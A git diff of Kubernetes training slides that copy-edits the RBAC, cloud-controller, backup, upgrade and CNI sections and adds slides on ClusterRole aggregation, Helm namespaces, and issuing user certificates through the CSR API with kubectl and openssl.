- The API "sees" us as a different user
|
||||
|
||||
- But neither user has any right, so we can't do nothin'
|
||||
- But neither user has any rights, so we can't do nothin'
|
||||
|
||||
- Let's change that!
|
||||
|
||||
@@ -337,9 +339,9 @@ class: extra-details
|
||||
|
||||
- A rule is a combination of:
|
||||
|
||||
- [verbs](https://kubernetes.io/docs/reference/access-authn-authz/authorization/#determine-the-request-verb) like create, get, list, update, delete ...
|
||||
- [verbs](https://kubernetes.io/docs/reference/access-authn-authz/authorization/#determine-the-request-verb) like create, get, list, update, delete...
|
||||
|
||||
- resources (as in "API resource", like pods, nodes, services ...)
|
||||
- resources (as in "API resource," like pods, nodes, services...)
|
||||
|
||||
- resource names (to specify e.g. one specific pod instead of all pods)
|
||||
|
||||
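Putting these three elements together, a minimal sketch of a Role (names are illustrative; note that `resourceNames` does not apply to `list`, `watch`, or `create`, hence the separate rule):

```bash
kubectl apply -f - <<EOF
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: pod-viewer
rules:
- apiGroups: [ "" ]
  resources: [ pods ]
  verbs: [ get, list ]
- apiGroups: [ "" ]
  resources: [ pods ]
  resourceNames: [ my-pod ]
  verbs: [ delete ]
EOF
```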
@@ -373,13 +375,13 @@ class: extra-details
|
||||
|
||||
- We can also define API resources ClusterRole and ClusterRoleBinding
|
||||
|
||||
- These are a superset, allowing to:
|
||||
- These are a superset, allowing us to:
|
||||
|
||||
- specify actions on cluster-wide objects (like nodes)
|
||||
|
||||
- operate across all namespaces
|
||||
|
||||
- We can create Role and RoleBinding resources within a namespaces
|
||||
- We can create Role and RoleBinding resources within a namespace
|
||||
|
||||
- ClusterRole and ClusterRoleBinding resources are global
|
||||
|
||||
@@ -387,13 +389,13 @@ class: extra-details
|
||||
|
||||
## Pods and service accounts
|
||||
|
||||
- A pod can be associated to a service account
|
||||
- A pod can be associated with a service account
|
||||
|
||||
- by default, it is associated to the `default` service account
|
||||
- by default, it is associated with the `default` service account
|
||||
|
||||
- as we've seen earlier, this service account has no permission anyway
|
||||
- as we saw earlier, this service account has no permissions anyway
|
||||
|
||||
- The associated token is exposed into the pod's filesystem
|
||||
- The associated token is exposed to the pod's filesystem
|
||||
|
||||
(in `/var/run/secrets/kubernetes.io/serviceaccount/token`)
|
||||
|
||||
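We can verify this from any pod (a sketch; the pod name is arbitrary):

```bash
kubectl run -it --rm tokentest --image=alpine --restart=Never -- \
  cat /var/run/secrets/kubernetes.io/serviceaccount/token
```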
@@ -407,7 +409,7 @@ class: extra-details
|
||||
|
||||
- We are going to create a service account
|
||||
|
||||
- We will use an existing cluster role (`view`)
|
||||
- We will use a default cluster role (`view`)
|
||||
|
||||
- We will bind together this role and this service account
|
||||
|
||||
@@ -458,7 +460,7 @@ class: extra-details
|
||||
|
||||
]
|
||||
|
||||
It's important to note a couple of details in these flags ...
|
||||
It's important to note a couple of details in these flags...
|
||||
|
||||
---
|
||||
|
||||
@@ -491,13 +493,13 @@ It's important to note a couple of details in these flags ...
|
||||
|
||||
- again, the command would have worked fine (no error)
|
||||
|
||||
- ... but our API requests would have been denied later
|
||||
- ...but our API requests would have been denied later
|
||||
|
||||
- What's about the `default:` prefix?
|
||||
|
||||
- that's the namespace of the service account
|
||||
|
||||
- yes, it could be inferred from context, but ... `kubectl` requires it
|
||||
- yes, it could be inferred from context, but... `kubectl` requires it
|
||||
|
||||
---
|
||||
|
||||
@@ -574,6 +576,51 @@ It's important to note a couple of details in these flags ...
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Where does this `view` role come from?
|
||||
|
||||
- Kubernetes defines a number of ClusterRoles intended to be bound to users
|
||||
|
||||
- `cluster-admin` can do *everything* (think `root` on UNIX)
|
||||
|
||||
- `admin` can do *almost everything* (except e.g. changing resource quotas and limits)
|
||||
|
||||
- `edit` is similar to `admin`, but cannot view or edit permissions
|
||||
|
||||
- `view` has read-only access to most resources, except permissions and secrets
|
||||
|
||||
*In many situations, these roles will be all you need.*
|
||||
|
||||
*You can also customize them!*
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Customizing the default roles
|
||||
|
||||
- If you need to *add* permissions to these default roles (or others),
|
||||
<br/>
|
||||
you can do it through the [ClusterRole Aggregation](https://kubernetes.io/docs/reference/access-authn-authz/rbac/#aggregated-clusterroles) mechanism
|
||||
|
||||
- This happens by creating a ClusterRole with the following labels:
|
||||
```yaml
|
||||
metadata:
|
||||
labels:
|
||||
rbac.authorization.k8s.io/aggregate-to-admin: "true"
|
||||
rbac.authorization.k8s.io/aggregate-to-edit: "true"
|
||||
rbac.authorization.k8s.io/aggregate-to-view: "true"
|
||||
```
|
||||
|
||||
- This ClusterRole's permissions will be added to `admin`/`edit`/`view`, respectively
|
||||
|
||||
- This is particularly useful when using CustomResourceDefinitions
|
||||
|
||||
(since Kubernetes cannot guess which resources are sensitive and which ones aren't)
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Where do our permissions come from?
|
||||
|
||||
- When interacting with the Kubernetes API, we are using a client certificate
|
||||
@@ -605,7 +652,7 @@ class: extra-details
|
||||
kubectl describe clusterrolebinding cluster-admin
|
||||
```
|
||||
|
||||
- This binding associates `system:masters` to the cluster role `cluster-admin`
|
||||
- This binding associates `system:masters` with the cluster role `cluster-admin`
|
||||
|
||||
- And the `cluster-admin` is, basically, `root`:
|
||||
```bash
|
||||
@@ -620,7 +667,7 @@ class: extra-details
|
||||
|
||||
- For auditing purposes, sometimes we want to know who can perform an action
|
||||
|
||||
- Here is a proof-of-concept tool by Aqua Security, doing exactly that:
|
||||
- There is a proof-of-concept tool by Aqua Security which does exactly that:
|
||||
|
||||
https://github.com/aquasecurity/kubectl-who-can
|
||||
|
||||
|
||||
@@ -20,15 +20,15 @@
|
||||
|
||||
- Configuring routing tables in the cloud network (specific to GCE)
|
||||
|
||||
- Updating node labels to indicate region, zone, instance type ...
|
||||
- Updating node labels to indicate region, zone, instance type...
|
||||
|
||||
- Obtain node name, internal and external addresses from cloud metadata service
|
||||
|
||||
- Deleting nodes from Kubernetes when they're deleted in the cloud
|
||||
|
||||
- Managing *some* volumes (e.g. ELBs, AzureDisks ...)
|
||||
- Managing *some* volumes (e.g. ELBs, AzureDisks...)
|
||||
|
||||
(Eventually, volumes will be managed by the CSI)
|
||||
(Eventually, volumes will be managed by the Container Storage Interface)
|
||||
|
||||
---
|
||||
|
||||
@@ -83,7 +83,7 @@ The list includes the following providers:
|
||||
|
||||
## Audience questions
|
||||
|
||||
- What kind of clouds are you using / planning to use?
|
||||
- What kind of clouds are you using/planning to use?
|
||||
|
||||
- What kind of details would you like to see in this section?
|
||||
|
||||
@@ -105,7 +105,7 @@ The list includes the following providers:
|
||||
|
||||
- When using managed clusters, this is done automatically
|
||||
|
||||
- There is very little documentation to write the configuration file
|
||||
- There is very little documentation on writing the configuration file
|
||||
|
||||
(except for OpenStack)
|
||||
|
||||
@@ -123,7 +123,7 @@ The list includes the following providers:
|
||||
|
||||
- To get these addresses, the node needs to communicate with the control plane
|
||||
|
||||
- ... Which means joining the cluster
|
||||
- ...Which means joining the cluster
|
||||
|
||||
(The problem didn't occur when cloud-specific code was running in kubelet: kubelet could obtain the required information directly from the cloud provider's metadata service.)
|
||||
|
||||
|
||||
@@ -6,7 +6,7 @@
|
||||
|
||||
- error recovery (human or process has altered or corrupted data)
|
||||
|
||||
- cloning environments (for testing, validation ...)
|
||||
- cloning environments (for testing, validation...)
|
||||
|
||||
- Let's see the strategies and tools available with Kubernetes!
|
||||
|
||||
@@ -18,13 +18,13 @@
|
||||
|
||||
(it gives us replication primitives)
|
||||
|
||||
- Kubernetes helps us to clone / replicate environments
|
||||
- Kubernetes helps us clone / replicate environments
|
||||
|
||||
(all resources can be described with manifests)
|
||||
|
||||
- Kubernetes *does not* help us with error recovery
|
||||
|
||||
- We still need to backup / snapshot our data:
|
||||
- We still need to back up/snapshot our data:
|
||||
|
||||
- with database backups (mysqldump, pgdump, etc.)
|
||||
|
||||
@@ -58,7 +58,7 @@
|
||||
|
||||
- If our deployment system isn't fully automated, it should at least be documented
|
||||
|
||||
- Litmus test: how long does it take to deploy a cluster ...
|
||||
- Litmus test: how long does it take to deploy a cluster...
|
||||
|
||||
- for a senior engineer?
|
||||
|
||||
@@ -66,7 +66,7 @@
|
||||
|
||||
- Does it require external intervention?
|
||||
|
||||
(e.g. provisioning servers, signing TLS certs ...)
|
||||
(e.g. provisioning servers, signing TLS certs...)
|
||||
|
||||
---
|
||||
|
||||
@@ -108,7 +108,7 @@
|
||||
|
||||
- For real applications: add resources (as YAML files)
|
||||
|
||||
- For applications deployed multiple times: Helm, Kustomize ...
|
||||
- For applications deployed multiple times: Helm, Kustomize...
|
||||
|
||||
(staging and production count as "multiple times")
|
||||
|
||||
|
||||
@@ -166,7 +166,7 @@
|
||||
|
||||
- Upgrade kubelet:
|
||||
```bash
|
||||
apt install kubelet=1.14.1-00
|
||||
apt install kubelet=1.14.2-00
|
||||
```
|
||||
|
||||
]
|
||||
@@ -267,7 +267,7 @@
|
||||
|
||||
- Perform the upgrade:
|
||||
```bash
|
||||
sudo kubeadm upgrade apply v1.14.1
|
||||
sudo kubeadm upgrade apply v1.14.2
|
||||
```
|
||||
|
||||
]
|
||||
@@ -287,8 +287,8 @@
|
||||
- Download the configuration on each node, and upgrade kubelet:
|
||||
```bash
|
||||
for N in 1 2 3; do
|
||||
ssh node$N sudo kubeadm upgrade node config --kubelet-version v1.14.1
|
||||
ssh node $N sudo apt install kubelet=1.14.1-00
|
||||
ssh test$N sudo kubeadm upgrade node config --kubelet-version v1.14.2
|
||||
ssh test$N sudo apt install kubelet=1.14.2-00
|
||||
done
|
||||
```
|
||||
]
|
||||
@@ -297,7 +297,7 @@
|
||||
|
||||
## Checking what we've done
|
||||
|
||||
- All our nodes should now be updated to version 1.14.1
|
||||
- All our nodes should now be updated to version 1.14.2
|
||||
|
||||
.exercise[
|
||||
|
||||
|
||||
@@ -26,7 +26,7 @@
|
||||
|
||||
The reference plugins are available [here].
|
||||
|
||||
Look into each plugin's directory for its documentation.
|
||||
Look in each plugin's directory for its documentation.
|
||||
|
||||
[here]: https://github.com/containernetworking/plugins/tree/master/plugins
|
||||
|
||||
@@ -66,6 +66,8 @@ Look into each plugin's directory for its documentation.
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Conf vs conflist
|
||||
|
||||
- There are two slightly different configuration formats
|
||||
@@ -98,7 +100,7 @@ class: extra-details
|
||||
|
||||
- CNI_NETNS: path to network namespace file
|
||||
|
||||
- CNI_IFNAME: how the network interface should be named
|
||||
- CNI_IFNAME: what the network interface should be named
|
||||
|
||||
- The network configuration must be provided to the plugin on stdin
|
||||
|
||||
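For reference, invoking a plugin by hand might look like this (a sketch; the paths, container ID, and config file name are illustrative):

```bash
sudo ip netns add demo
sudo env CNI_COMMAND=ADD CNI_CONTAINERID=demo \
         CNI_NETNS=/var/run/netns/demo CNI_IFNAME=eth0 \
         CNI_PATH=/opt/cni/bin \
     /opt/cni/bin/bridge < /etc/cni/net.d/10-bridge.conf
```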
@@ -188,12 +190,16 @@ class: extra-details
|
||||
|
||||
- ... But this time, the controller manager will allocate `podCIDR` subnets
|
||||
|
||||
- We will start kube-router with a DaemonSet
|
||||
(so that we don't have to manually assign subnets to individual nodes)
|
||||
|
||||
- This DaemonSet will start one instance of kube-router on each node
|
||||
- We will create a DaemonSet for kube-router
|
||||
|
||||
- We will join nodes to the cluster
|
||||
|
||||
- The DaemonSet will automatically start a kube-router pod on each node
|
||||
|
||||
---
|
||||
|
||||
|
||||
## Logging into the new cluster
|
||||
|
||||
.exercise[
|
||||
@@ -221,7 +227,7 @@ class: extra-details
|
||||
- It is similar to the one we used with the `kubenet` cluster
|
||||
|
||||
- The API server is started with `--allow-privileged`
|
||||
|
||||
|
||||
(because we will start kube-router in privileged pods)
|
||||
|
||||
- The controller manager is started with extra flags too:
|
||||
@@ -254,7 +260,7 @@ class: extra-details
|
||||
|
||||
---
|
||||
|
||||
## The kube-router DaemonSet
|
||||
## The kube-router DaemonSet
|
||||
|
||||
- In the same directory, there is a `kuberouter.yaml` file
|
||||
|
||||
@@ -272,7 +278,7 @@ class: extra-details
|
||||
|
||||
- The address of the API server will be `http://A.B.C.D:8080`
|
||||
|
||||
(where `A.B.C.D` is the address of `kuberouter1`, running the control plane)
|
||||
(where `A.B.C.D` is the public address of `kuberouter1`, running the control plane)
|
||||
|
||||
.exercise[
|
||||
|
||||
@@ -300,12 +306,10 @@ Note: the DaemonSet won't create any pods (yet) since there are no nodes (yet).
|
||||
|
||||
- Generate the kubeconfig file (replacing `X.X.X.X` with the address of `kuberouter1`):
|
||||
```bash
|
||||
kubectl --kubeconfig ~/kubeconfig config \
|
||||
set-cluster kubenet --server http://`X.X.X.X`:8080
|
||||
kubectl --kubeconfig ~/kubeconfig config \
|
||||
set-context kubenet --cluster kubenet
|
||||
kubectl --kubeconfig ~/kubeconfig config\
|
||||
use-context kubenet
|
||||
kubectl config set-cluster cni --server http://`X.X.X.X`:8080
|
||||
kubectl config set-context cni --cluster cni
|
||||
kubectl config use-context cni
|
||||
cp ~/.kube/config ~/kubeconfig
|
||||
```
|
||||
|
||||
]
|
||||
@@ -451,7 +455,7 @@ We should see the local pod CIDR connected to `kube-bridge`, and the other nodes
|
||||
|
||||
- Or try to exec into one of the kube-router pods:
|
||||
```bash
|
||||
kubectl -n kube-system exec kuber-router-xxxxx bash
|
||||
kubectl -n kube-system exec kube-router-xxxxx bash
|
||||
```
|
||||
|
||||
]
|
||||
@@ -487,8 +491,8 @@ What does that mean?
|
||||
|
||||
- First, get the container ID, with `docker ps` or like this:
|
||||
```bash
|
||||
CID=$(docker ps
|
||||
--filter label=io.kubernetes.pod.namespace=kube-system
|
||||
CID=$(docker ps -q \
|
||||
--filter label=io.kubernetes.pod.namespace=kube-system \
|
||||
--filter label=io.kubernetes.container.name=kube-router)
|
||||
```
|
||||
|
||||
@@ -573,7 +577,7 @@ done
|
||||
|
||||
## Starting the route reflector
|
||||
|
||||
- Only do this if you are doing this on your own
|
||||
- Only do this slide if you are doing this on your own
|
||||
|
||||
- There is a Compose file in the `compose/frr-route-reflector` directory
|
||||
|
||||
@@ -599,13 +603,13 @@ done
|
||||
|
||||
## Updating kube-router configuration
|
||||
|
||||
- We need to add two command-line flags to the kube-router process
|
||||
- We need to pass two command-line flags to the kube-router process
|
||||
|
||||
.exercise[
|
||||
|
||||
- Edit the `kuberouter.yaml` file
|
||||
|
||||
- Add the following flags to the kube-router arguments,:
|
||||
- Add the following flags to the kube-router arguments:
|
||||
```
|
||||
- "--peer-router-ips=`X.X.X.X`"
|
||||
- "--peer-router-asns=64512"
|
||||
|
||||
@@ -136,6 +136,8 @@ class: pic
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Running the control plane on special nodes
|
||||
|
||||
- It is common to reserve a dedicated node for the control plane
|
||||
@@ -158,6 +160,8 @@ class: pic
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Running the control plane outside containers
|
||||
|
||||
- The services of the control plane can run in or out of containers
|
||||
@@ -173,10 +177,12 @@ class: pic
|
||||
|
||||
- In that case, there is no "master node"
|
||||
|
||||
*For this reason, it is more accurate to say "control plane" rather than "master".*
|
||||
*For this reason, it is more accurate to say "control plane" rather than "master."*
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Do we need to run Docker at all?
|
||||
|
||||
No!
|
||||
@@ -193,6 +199,8 @@ No!
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Do we need to run Docker at all?
|
||||
|
||||
Yes!
|
||||
@@ -215,6 +223,8 @@ Yes!
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Do we need to run Docker at all?
|
||||
|
||||
- On our development environments, CI pipelines ... :
|
||||
@@ -231,25 +241,21 @@ Yes!
|
||||
|
||||
---
|
||||
|
||||
## Kubernetes resources
|
||||
## Interacting with Kubernetes
|
||||
|
||||
- The Kubernetes API defines a lot of objects called *resources*
|
||||
- We will interact with our Kubernetes cluster through the Kubernetes API
|
||||
|
||||
- These resources are organized by type, or `Kind` (in the API)
|
||||
- The Kubernetes API is (mostly) RESTful
|
||||
|
||||
- It allows us to create, read, update, delete *resources*
|
||||
|
||||
- A few common resource types are:
|
||||
|
||||
- node (a machine — physical or virtual — in our cluster)
|
||||
|
||||
- pod (group of containers running together on a node)
|
||||
|
||||
- service (stable network endpoint to connect to one or multiple containers)
|
||||
- namespace (more-or-less isolated group of things)
|
||||
- secret (bundle of sensitive data to be passed to a container)
|
||||
|
||||
And much more!
|
||||
|
||||
- We can see the full list by running `kubectl api-resources`
|
||||
|
||||
(In Kubernetes 1.10 and prior, the command to list API resources was `kubectl get`)
|
||||
|
||||
---
|
||||
|
||||
|
||||
@@ -22,7 +22,7 @@
|
||||
|
||||
- There are many ways to pass configuration to code running in a container:
|
||||
|
||||
- baking it in a custom image
|
||||
- baking it into a custom image
|
||||
|
||||
- command-line arguments
|
||||
|
||||
@@ -125,7 +125,7 @@
|
||||
|
||||
- We can also use a mechanism called the *downward API*
|
||||
|
||||
- The downward API allows to expose pod or container information
|
||||
- The downward API allows exposing pod or container information
|
||||
|
||||
- either through special files (we won't show that for now)
|
||||
|
||||
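A sketch of the environment variable flavor (the field paths are part of the downward API; the variable and pod names are arbitrary):

```bash
kubectl apply -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
  name: downward-demo
spec:
  containers:
  - name: main
    image: alpine
    command: [ sh, -c, "echo running as \$MY_POD_NAME on \$MY_NODE_NAME; sleep 3600" ]
    env:
    - name: MY_POD_NAME
      valueFrom:
        fieldRef:
          fieldPath: metadata.name
    - name: MY_NODE_NAME
      valueFrom:
        fieldRef:
          fieldPath: spec.nodeName
EOF
```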
@@ -436,7 +436,7 @@ We should see connections served by Google, and others served by IBM.
|
||||
|
||||
- We are going to store the port number in a configmap
|
||||
|
||||
- Then we will expose that configmap to a container environment variable
|
||||
- Then we will expose that configmap as a container environment variable
|
||||
|
||||
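A sketch of the two halves (the configmap name and key are arbitrary):

```bash
# Store the port number:
kubectl create configmap registry --from-literal=http.port=5000

# Then, in the container spec, reference it:
#   env:
#   - name: HTTP_PORT
#     valueFrom:
#       configMapKeyRef:
#         name: registry
#         key: http.port
```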
---
|
||||
|
||||
|
||||
@@ -34,7 +34,7 @@
|
||||
```bash
|
||||
|
||||
while read kind name; do
|
||||
kubectl get -o yaml --export $kind $name > dockercoins/templates/$name-$kind.yaml
|
||||
kubectl get -o yaml $kind $name > dockercoins/templates/$name-$kind.yaml
|
||||
done <<EOF
|
||||
deployment worker
|
||||
deployment hasher
|
||||
@@ -69,3 +69,46 @@
|
||||
`Error: release loitering-otter failed: services "hasher" already exists`
|
||||
|
||||
- To avoid naming conflicts, we will deploy the application in another *namespace*
|
||||
|
||||
---
|
||||
|
||||
## Switching to another namespace
|
||||
|
||||
- We can create a new namespace and switch to it
|
||||
|
||||
(Helm will automatically use the namespace specified in our context)
|
||||
|
||||
- We can also tell Helm which namespace to use
|
||||
|
||||
.exercise[
|
||||
|
||||
- Tell Helm to use a specific namespace:
|
||||
```bash
|
||||
helm install dockercoins --namespace=magenta
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Checking our new copy of DockerCoins
|
||||
|
||||
- We can check the worker logs, or the web UI
|
||||
|
||||
.exercise[
|
||||
|
||||
- Retrieve the NodePort number of the web UI:
|
||||
```bash
|
||||
kubectl get service webui --namespace=magenta
|
||||
```
|
||||
|
||||
- Open it in a web browser
|
||||
|
||||
- Look at the worker logs:
|
||||
```bash
|
||||
kubectl logs deploy/worker --tail=10 --follow --namespace=magenta
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
Note: it might take a minute or two for the worker to start.
|
||||
|
||||
426
slides/k8s/csr-api.md
Normal file
426
slides/k8s/csr-api.md
Normal file
@@ -0,0 +1,426 @@
|
||||
# The CSR API
|
||||
|
||||
- The Kubernetes API exposes CSR resources
|
||||
|
||||
- We can use these resources to issue TLS certificates
|
||||
|
||||
- First, we will go through a quick reminder about TLS certificates
|
||||
|
||||
- Then, we will see how to obtain a certificate for a user
|
||||
|
||||
- We will use that certificate to authenticate with the cluster
|
||||
|
||||
- Finally, we will grant some privileges to that user
|
||||
|
||||
---
|
||||
|
||||
## Reminder about TLS
|
||||
|
||||
- TLS (Transport Layer Security) is a protocol providing:
|
||||
|
||||
- encryption (to prevent eavesdropping)
|
||||
|
||||
- authentication (using public key cryptography)
|
||||
|
||||
- When we access an https:// URL, the server authenticates itself
|
||||
|
||||
(it proves its identity to us; as if it were "showing its ID")
|
||||
|
||||
- But we can also have mutual TLS authentication (mTLS)
|
||||
|
||||
(client proves its identity to server; server proves its identity to client)
|
||||
|
||||
---
|
||||
|
||||
## Authentication with certificates
|
||||
|
||||
- To authenticate, someone (client or server) needs:
|
||||
|
||||
- a *private key* (that remains known only to them)
|
||||
|
||||
- a *public key* (that they can distribute)
|
||||
|
||||
- a *certificate* (associating the public key with an identity)
|
||||
|
||||
- A message encrypted with the private key can only be decrypted with the public key
|
||||
|
||||
(and vice versa)
|
||||
|
||||
- If I use someone's public key to encrypt/decrypt their messages,
|
||||
<br/>
|
||||
I can be certain that I am talking to them / they are talking to me
|
||||
|
||||
- The certificate proves that I have the correct public key for them
|
||||
|
||||
---
|
||||
|
||||
## Certificate generation workflow
|
||||
|
||||
This is what I do if I want to obtain a certificate.
|
||||
|
||||
1. Create public and private keys.
|
||||
|
||||
2. Create a Certificate Signing Request (CSR).
|
||||
|
||||
(The CSR contains the identity that I claim and a public key.)
|
||||
|
||||
3. Send that CSR to the Certificate Authority (CA).
|
||||
|
||||
4. The CA verifies that I can claim the identity in the CSR.
|
||||
|
||||
5. The CA generates my certificate and gives it to me.
|
||||
|
||||
The CA (or anyone else) never needs to know my private key.
|
||||
|
||||
---
|
||||
|
||||
## The CSR API
|
||||
|
||||
- The Kubernetes API has a CertificateSigningRequest resource type
|
||||
|
||||
(we can list them with e.g. `kubectl get csr`)
|
||||
|
||||
- We can create a CSR object
|
||||
|
||||
(= upload a CSR to the Kubernetes API)
|
||||
|
||||
- Then, using the Kubernetes API, we can approve/deny the request
|
||||
|
||||
- If we approve the request, the Kubernetes API generates a certificate
|
||||
|
||||
- The certificate gets attached to the CSR object and can be retrieved
|
||||
|
||||
---
|
||||
|
||||
## Using the CSR API
|
||||
|
||||
- We will show how to use the CSR API to obtain user certificates
|
||||
|
||||
- This will be a rather complex demo
|
||||
|
||||
- ...And yet, we will take a few shortcuts to simplify it
|
||||
|
||||
(but it will illustrate the general idea)
|
||||
|
||||
- The demo also won't be automated
|
||||
|
||||
(we would have to write extra code to make it fully functional)
|
||||
|
||||
---
|
||||
|
||||
## General idea
|
||||
|
||||
- We will create a Namespace named "users"
|
||||
|
||||
- Each user will get a ServiceAccount in that Namespace
|
||||
|
||||
- That ServiceAccount will give read/write access to *one* CSR object
|
||||
|
||||
- Users will use that ServiceAccount's token to submit a CSR
|
||||
|
||||
- We will approve the CSR (or not)
|
||||
|
||||
- Users can then retrieve their certificate from their CSR object
|
||||
|
||||
- ...And use that certificate for subsequent interactions
|
||||
|
||||
---
|
||||
|
||||
## Resource naming
|
||||
|
||||
For a user named `jean.doe`, we will have:
|
||||
|
||||
- ServiceAccount `jean.doe` in Namespace `users`
|
||||
|
||||
- CertificateSigningRequest `users:jean.doe`
|
||||
|
||||
- ClusterRole `users:jean.doe` giving read/write access to that CSR
|
||||
|
||||
- ClusterRoleBinding `users:jean.doe` binding ClusterRole and ServiceAccount
|
||||
|
||||
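The YAML file used in the next slide isn't reproduced here; a plausible sketch of its contents (the `create` verb cannot be restricted by `resourceNames`, hence the two rules):

```yaml
apiVersion: v1
kind: ServiceAccount
metadata:
  name: jean.doe
  namespace: users
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: users:jean.doe
rules:
- apiGroups: [ certificates.k8s.io ]
  resources: [ certificatesigningrequests ]
  verbs: [ create, list ]
- apiGroups: [ certificates.k8s.io ]
  resources: [ certificatesigningrequests ]
  resourceNames: [ "users:jean.doe" ]
  verbs: [ get, watch ]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: users:jean.doe
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: users:jean.doe
subjects:
- kind: ServiceAccount
  name: jean.doe
  namespace: users
```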
---
|
||||
|
||||
## Creating the user's resources
|
||||
|
||||
.warning[If you want to use a name other than `jean.doe`, update the YAML file!]
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create the global namespace for all users:
|
||||
```bash
|
||||
kubectl create namespace users
|
||||
```
|
||||
|
||||
- Create the ServiceAccount, ClusterRole, ClusterRoleBinding for `jean.doe`:
|
||||
```bash
|
||||
kubectl apply -f ~/container.training/k8s/users:jean.doe.yaml
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Extracting the user's token
|
||||
|
||||
- Let's obtain the user's token and give it to them
|
||||
|
||||
(the token will be their password)
|
||||
|
||||
.exercise[
|
||||
|
||||
- List the user's secrets:
|
||||
```bash
|
||||
kubectl --namespace=users describe serviceaccount jean.doe
|
||||
```
|
||||
|
||||
- Show the user's token:
|
||||
```bash
|
||||
kubectl --namespace=users describe secret `jean.doe-token-xxxxx`
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Configure `kubectl` to use the token
|
||||
|
||||
- Let's create a new context that will use that token to access the API
|
||||
|
||||
.exercise[
|
||||
|
||||
- Add a new identity to our kubeconfig file:
|
||||
```bash
|
||||
kubectl config set-credentials token:jean.doe --token=...
|
||||
```
|
||||
|
||||
- Add a new context using that identity:
|
||||
```bash
|
||||
kubectl config set-context jean.doe --user=token:jean.doe --cluster=kubernetes
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Access the API with the token
|
||||
|
||||
- Let's check that our access rights are set properly
|
||||
|
||||
.exercise[
|
||||
|
||||
- Try to access any resource:
|
||||
```bash
|
||||
kubectl get pods
|
||||
```
|
||||
(This should tell us "Forbidden")
|
||||
|
||||
- Try to access "our" CertificateSigningRequest:
|
||||
```bash
|
||||
kubectl get csr users:jean.doe
|
||||
```
|
||||
(This should tell us "NotFound")
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Create a key and a CSR
|
||||
|
||||
- There are many tools to generate TLS keys and CSRs
|
||||
|
||||
- Let's use OpenSSL; it's not the best one, but it's installed everywhere
|
||||
|
||||
(many people prefer cfssl, easyrsa, or other tools; that's fine too!)
|
||||
|
||||
.exercise[
|
||||
|
||||
- Generate the key and certificate signing request:
|
||||
```bash
|
||||
openssl req -newkey rsa:2048 -nodes -keyout key.pem \
|
||||
-new -subj /CN=jean.doe/O=devs/ -out csr.pem
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
The command above generates:
|
||||
|
||||
- a 2048-bit RSA key, without encryption, stored in `key.pem`
|
||||
- a CSR for the name `jean.doe` in group `devs`
|
||||
|
||||
---
|
||||
|
||||
## Inside the Kubernetes CSR object
|
||||
|
||||
- The Kubernetes CSR object is a thin wrapper around the CSR PEM file
|
||||
|
||||
- The PEM file needs to be encoded to base64 on a single line
|
||||
|
||||
(we will use `base64 -w0` for that purpose)
|
||||
|
||||
- The Kubernetes CSR object also needs to list the right "usages"
|
||||
|
||||
(these are flags indicating how the certificate can be used)
|
||||
|
||||
---
|
||||
|
||||
## Sending the CSR to Kubernetes
|
||||
|
||||
.exercise[
|
||||
|
||||
- Generate and create the CSR resource:
|
||||
```bash
|
||||
kubectl apply -f - <<EOF
|
||||
apiVersion: certificates.k8s.io/v1beta1
|
||||
kind: CertificateSigningRequest
|
||||
metadata:
|
||||
name: users:jean.doe
|
||||
spec:
|
||||
request: $(base64 -w0 < csr.pem)
|
||||
usages:
|
||||
- digital signature
|
||||
- key encipherment
|
||||
- client auth
|
||||
EOF
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Adjusting certificate expiration
|
||||
|
||||
- By default, the CSR API generates certificates valid for 1 year
|
||||
|
||||
- We want to generate short-lived certificates, so we will lower that to 1 hour
|
||||
|
||||
- For now, this is configured [through an experimental controller manager flag](https://github.com/kubernetes/kubernetes/issues/67324)
|
||||
|
||||
.exercise[
|
||||
|
||||
- Edit the static pod definition for the controller manager:
|
||||
```bash
|
||||
sudo vim /etc/kubernetes/manifests/kube-controller-manager.yaml
|
||||
```
|
||||
|
||||
- In the list of flags, add the following line:
|
||||
```bash
|
||||
- --experimental-cluster-signing-duration=1h
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Verifying and approving the CSR
|
||||
|
||||
- Let's inspect the CSR, and if it is valid, approve it
|
||||
|
||||
.exercise[
|
||||
|
||||
- Switch back to `cluster-admin`:
|
||||
```bash
|
||||
kctx -
|
||||
```
|
||||
|
||||
- Inspect the CSR:
|
||||
```bash
|
||||
kubectl describe csr users:jean.doe
|
||||
```
|
||||
|
||||
- Approve it:
|
||||
```bash
|
||||
kubectl certificate approve users:jean.doe
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Obtaining the certificate
|
||||
|
||||
.exercise[
|
||||
|
||||
- Switch back to the user's identity:
|
||||
```bash
|
||||
kctx -
|
||||
```
|
||||
|
||||
- Retrieve the updated CSR object and extract the certificate:
|
||||
```bash
|
||||
kubectl get csr users:jean.doe \
|
||||
-o jsonpath={.status.certificate} \
|
||||
| base64 -d > cert.pem
|
||||
```
|
